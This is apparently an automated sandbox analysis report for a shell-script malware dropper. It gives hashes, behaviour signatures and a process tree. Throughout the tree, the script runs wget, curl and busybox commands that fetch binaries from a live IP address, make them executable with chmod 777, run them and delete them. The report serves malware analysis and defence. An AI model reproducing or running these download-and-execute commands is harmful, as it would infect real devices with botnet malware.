Analysis
-
max time kernel
87s -
max time network
89s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 02:12
Static task
static1
Behavioral task
behavioral1
Sample
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh
-
Size
10KB
-
MD5
d8b3cb4793886f8ba51c73bc3cadbaca
-
SHA1
2a4c460dad61345bdd09351812e2865159abe9dd
-
SHA256
1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31
-
SHA512
dac5943a6be21fdaf966f6845585dedf0d97cbfa7743cd046fe3570f9ed3a292545364c7f491984555e1e5c5093f3ed46570d03629c6f6786b735a294788e013
-
SSDEEP
192:rmjDQXL2FkYrQo5MENdKVRKKmdNdKVR2kYrQoYjDQXLoN:UFkYrQo5MAKmbkYrQo6
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 959 chmod 977 chmod 887 chmod 899 chmod 911 chmod 941 chmod 965 chmod 971 chmod 755 chmod 761 chmod 917 chmod 947 chmod 767 chmod 875 chmod 905 chmod 881 chmod 989 chmod 869 chmod 923 chmod 929 chmod 983 chmod 822 chmod 893 chmod 953 chmod 935 chmod 747 chmod 791 chmod 832 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv 749 LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv /tmp/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB 756 x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB /tmp/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM 762 jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM /tmp/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj 769 mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj /tmp/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6 792 kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6 /tmp/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy 823 ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy /tmp/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b 833 CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b /tmp/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI 870 HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI /tmp/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY 876 dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY /tmp/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9 882 Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9 /tmp/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ 888 ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ /tmp/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0 894 yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0 /tmp/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX 900 ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX /tmp/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr 906 vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr /tmp/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6 912 kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6 /tmp/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj 918 mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj /tmp/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY 924 dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY /tmp/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy 930 ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy /tmp/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b 936 CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b /tmp/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI 942 HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI /tmp/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX 948 ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX /tmp/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr 954 vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr /tmp/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9 960 Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9 /tmp/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ 966 ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ /tmp/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0 972 yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0 /tmp/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM 978 jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM /tmp/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv 984 LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv /tmp/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB 990 x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv curl File opened for modification /tmp/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB curl File opened for modification /tmp/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ curl File opened for modification /tmp/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ curl File opened for modification /tmp/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0 curl File opened for modification /tmp/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB curl File opened for modification /tmp/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj curl File opened for modification /tmp/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj curl File opened for modification /tmp/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM curl File opened for modification /tmp/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9 curl File opened for modification /tmp/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX curl File opened for modification /tmp/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6 curl File opened for modification /tmp/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0 curl File opened for modification /tmp/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b curl File opened for modification /tmp/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY curl File opened for modification /tmp/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX curl File opened for modification /tmp/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9 curl File opened for modification /tmp/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy curl File opened for modification /tmp/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI curl File opened for modification /tmp/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI curl File opened for modification /tmp/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv curl File opened for modification /tmp/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6 curl File opened for modification /tmp/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr curl File opened for modification /tmp/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM curl File opened for modification /tmp/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY curl File opened for modification /tmp/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr curl File opened for modification /tmp/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy curl File opened for modification /tmp/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b curl
Processes
-
/tmp/1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh/tmp/1c58f747753e3352a46c2916d9f5f8d5dc3b9e04b66f38485025b53dd25ceb31.sh1⤵PID:717
-
/bin/rm/bin/rm bins.sh2⤵PID:722
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:725
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:745
-
-
/bin/chmodchmod 777 LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv./LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:754
-
-
/bin/chmodchmod 777 x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB./x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:757
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:758
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:760
-
-
/bin/chmodchmod 777 jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM./jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- Executes dropped EXE
PID:762
-
-
/bin/rmrm jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:763
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:764
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:766
-
-
/bin/chmodchmod 777 mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj./mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- Executes dropped EXE
PID:769
-
-
/bin/rmrm mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:773
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:787
-
-
/bin/chmodchmod 777 kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6./kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:795
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:796
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:818
-
-
/bin/chmodchmod 777 ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy./ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:829
-
-
/bin/chmodchmod 777 CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b./CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:836
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:838
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:868
-
-
/bin/chmodchmod 777 HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI./HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:874
-
-
/bin/chmodchmod 777 dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY./dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:880
-
-
/bin/chmodchmod 777 Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9./Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:886
-
-
/bin/chmodchmod 777 ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ./ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:892
-
-
/bin/chmodchmod 777 yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0./yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:898
-
-
/bin/chmodchmod 777 ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX./ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:904
-
-
/bin/chmodchmod 777 vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr./vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:910
-
-
/bin/chmodchmod 777 kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR6./kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm kfwS7wOIBEbGnDlNgIYPtkq2cUhYxNRKR62⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:916
-
-
/bin/chmodchmod 777 mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj./mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm mG8jhawTG4Xzo5qVJOAtUc3oWwx6xD5ygj2⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:922
-
-
/bin/chmodchmod 777 dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY./dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm dgsHqP1cvK7UnJfCpnuwEPvwI8QeIKg8rY2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:928
-
-
/bin/chmodchmod 777 ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy./ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm ZtcSjUYkmxGVvvr0kYFOTfNHxnzmDq2ZRy2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:934
-
-
/bin/chmodchmod 777 CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b./CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm CL8hJQrmppmOrTWtvBgXCJ1rHCBgSGGp8b2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:940
-
-
/bin/chmodchmod 777 HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI./HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm HJzoWn5kIdjZrfL5FCXesTNExDbT4BNyeI2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:946
-
-
/bin/chmodchmod 777 ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
